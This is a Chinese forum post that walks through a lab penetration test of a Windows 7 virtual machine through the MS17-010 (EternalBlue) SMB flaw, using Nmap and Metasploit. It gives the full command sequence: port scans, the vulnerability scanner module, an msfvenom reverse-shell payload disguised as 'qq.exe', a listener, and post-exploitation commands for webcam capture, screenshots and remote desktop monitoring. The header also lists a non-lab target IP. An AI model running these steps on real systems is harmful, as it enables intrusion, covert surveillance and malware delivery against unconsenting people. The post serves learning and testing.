TA的每日心情 | 奋斗 2025-4-18 14:54 |
---|
签到天数: 140 天 [LV.7]常住居民III
|
本次实验思路可能会有些乱,有的操作可能有重复或者不连贯的可能,仅供参考,大佬勿喷,欢迎各位评论留言,批评指正
【文章标题】:利用ms17-010漏洞对win7进行渗透
【文章作者】:Alex
【目标地址】:110.64.216.76
【渗透用时】:1h
【所用工具】:Kali–>metasploit平台、Nmap
【本机环境】:kali
【目标环境】:Windows 7
-------------------------------------------
【渗透过程】
1.永恒之蓝是什么
1.1 定义
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
1.2 原理
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
2. 445端口的作用
SMB(server message blick) 是windows协议族,用于文件和打印共享服务。
3. Metasploit是什么
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
4. 渗透实验准备
靶机:Windows 7 虚拟机 ip(目标地址):10.64.216.76
攻击机:kali 虚拟机 ip:10.64.216.217
工具:kali自带的Nmap及metasploit攻击框架
5. 渗透实验过程
(1)以root身份登录kali,并初始化数据库启动metasploit
msfdb init 初始化数据库
图片1.png
(11.44 KB, 下载次数: 2)
msfconsole 启动metasploit
图片2.png
(49.56 KB, 下载次数: 0)
(2)扫描目标ip端口
利用nmap模块进行扫描,检查目标ip哪些端口是打开的
db_nmap -sT -T4 10.64.216.76 可以看到靶机的445端口是打开的
图片3.png
(98.82 KB, 下载次数: 0)
扩展:namp重要常用参数含义
-sP ping 扫描(不进行端口扫描)
-P0 无ping 扫描
-p 指定端口扫描
-sT TCP 全连接扫描
-sS SYN 半连接扫描
-sF FIN 扫描
-sN Null 扫描
-sX Xmas 扫描
-O 测探目标主机版本
-sV 显示服务的详细版本
-A 全面扫描
-oN 将扫描结果保存成txt 格式
-oX 将扫描结果保存成xml 格式
-T1,-T2,-T3,-T4,-T5 扫描速度
(3)查看该网络中所有主机和服务
host 可检查该网络中所有主机
图片4.png
(24.05 KB, 下载次数: 0)
service 可查看该网络中所有服务
图片5.png
(27.75 KB, 下载次数: 0)
(4)Metasploit端口扫描
auxiliary/scanner/portscan/ack ACK防火墙扫描
图片6.png
(98.51 KB, 下载次数: 0)
拓展:
auxiliary/scanner/portscan/ftpbounce FTP 跳端口扫描
auxiliary/scanner/portscan/syn SYN端口扫描
auxiliary/scanner/portscan/tcp TCP端口扫描
auxiliary/scanner/portscan/xmas TCP"XMas"端口扫描
(5)搜索并调用ms17-010扫描模块
search ms17_010 搜索ms17_010扫描模块
图片7.png
(7.51 KB, 下载次数: 0)
use auxiliary/scanner/smb/smb_ms17_010 启动永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
图片8.png
(95.8 KB, 下载次数: 0)
(6)查看模块需要配置的参数
show options 可查看调用模块需要配置的参数
右边Required为yes的选项说明左边对应的项需要填写
图片9.png
(28.84 KB, 下载次数: 0)
(7)设置rhost并启动模块
RHOSTS 即要探测主机的ip或ip范围
run 启动模块
10.jpg
(281.92 KB, 下载次数: 0)
(8)现在已拿到靶机的shell
ipconfig 进行查看目标机的网卡信息
图片11.png
(45.63 KB, 下载次数: 0)
sysinfo 查看目标机操作系统信息
图片12.png
(16.71 KB, 下载次数: 0)
(9)调用载荷
(9.1)新建控制台窗口,并查看 msf的payload列表
msfvenom --list payload查看所有可用的payload
图片13.png
(264.07 KB, 下载次数: 0)
拓展:
病毒通常会做一些有害的或者恶性的动作。在病毒代码中实现这个功能的部分叫做“有效负载”(payload)。payload可以实现任何运行在受害者环境中的程序所能做的事情,并且能够执行动作包括破坏文件删除文件,向病毒的作者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。
——— 摘自《决战恶意代码(美)斯考迪斯》P20
(9.2)在攻击服务器上生成连接软件,lhost为攻击机ip
msfbenom -p windows/meterpreter/reverse_tcp lhost(攻击机IP) lport=8881 -f exe > qq.exe 我这里不知怎么回事显示失败了,可能是我之前已经生成的缘故
图片14.png
(51.88 KB, 下载次数: 0)
(9.3)之后检测qq.EXE是否为win7中可用项目
输入 file qq2.exe
图片15.png
(18.34 KB, 下载次数: 0)
(10)返回第一次的msf页面,调用侦听模块 exploitmultihandler
use exploit/multi/handler
图片16.png
(28.32 KB, 下载次数: 0)
(10.1)show options 查看配置参数
图片17.png
(85.75 KB, 下载次数: 0)
(11)配置payload
set payload windows/meterpreter/reverse_tcp
图片18.png
(14.21 KB, 下载次数: 0)
(12)检查配置
show options
图片19.png
(118.18 KB, 下载次数: 0)
(13)设置攻击机ip和监听端口,将软件发给目标机并进行监听
set lhost 10.64.216.217 设置攻击机ip
set lport 8881 设置端口8881为监听端口
run或者exploit 此时kali上会显示连接提示
图片20.png
(73.34 KB, 下载次数: 1)
(14)测试是否连接成功
shell 测试是否连接成功,如出现如图情况则说明攻击成功
21.jpg
(190.54 KB, 下载次数: 0)
对目标机操作命令拓展:
webcam_list 查看摄像头
Webcam_snap 拍照
Webcam_stream 开启视频
Screenshot 获取截图
Screenshare 实时监控桌面
Shutdown 关闭机器
webcam_stream 开启摄像头
screenshot 截取屏幕
run vnc 屏幕监控 (若对方电脑上有安全软件会不稳定或者失败)
【渗透总结】
1、auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,探测主机是否存在MS17_010漏洞
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击
2、use auxiliary/scanner/smb/smb_ms17_010 该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试
3、若控制靶机之后执行命令返回的信息出现乱码,则执行命令 chcp 65001 切换编码字符,然后执行命令显示正常。
【作者声明】
本文章仅供参考,此文所提供的信息只为网络安全人员进行学习参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行**操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。 |
|